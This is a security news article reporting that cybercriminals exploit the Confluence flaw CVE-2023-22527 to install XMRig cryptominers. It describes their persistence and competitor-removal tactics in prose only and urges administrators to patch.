Exploitation of Weakness in Atlassian Confluence Leads to Illegal Cryptocurrency Mining
Cybercriminals are currently taking advantage of a recently fixed, crucial security loophole affecting the Atlassian Confluence Data Center and Confluence Server to engage in unlawful cryptocurrency mining on vulnerable systems.
“The breaches are linked to cybercriminals who utilize methods such as executing shell scripts and XMRig miners, focusing on SSH endpoints, halting rival cryptocurrency mining operations, and securing continuous operation through cron jobs,” Abdelrahman Esmail, a researcher at Trend Micro, mentioned.
The weak spot targeted is CVE-2023-22527, a severe flaw in earlier versions of Atlassian Confluence Data Center and Confluence Server that could permit unauthorized attackers to execute remote code. The Australian software firm addressed this issue in the middle of January 2024.
Trend Micro reported a surge in exploit attempts against the vulnerability from the middle of June to the end of July 2024, with attackers using it to deploy the XMRig miner on unpatched hosts. At least three distinct cybercrime groups are believed to be responsible for these malicious activities –
- Initiating the XMRig miner through an ELF file payload utilizing meticulously crafted requests
- Employing a script that initially terminates competing cryptojacking schemes (e.g., Kinsing), wipes out all existing cron jobs, removes cloud security solutions from Alibaba and Tencent, collects system data, then establishes a new cron job to monitor command-and-control (C2) server connectivity every five minutes and deploy the miner
“Given the continuous exploitation by cybercriminals, CVE-2023-22527 poses a significant security threat to organizations globally,” Esmail cautioned.
“To mitigate the dangers and risks associated with this vulnerability, administrators are urged to update their installations of Confluence Data Center and Confluence Server to the latest versions available immediately.”
About Author
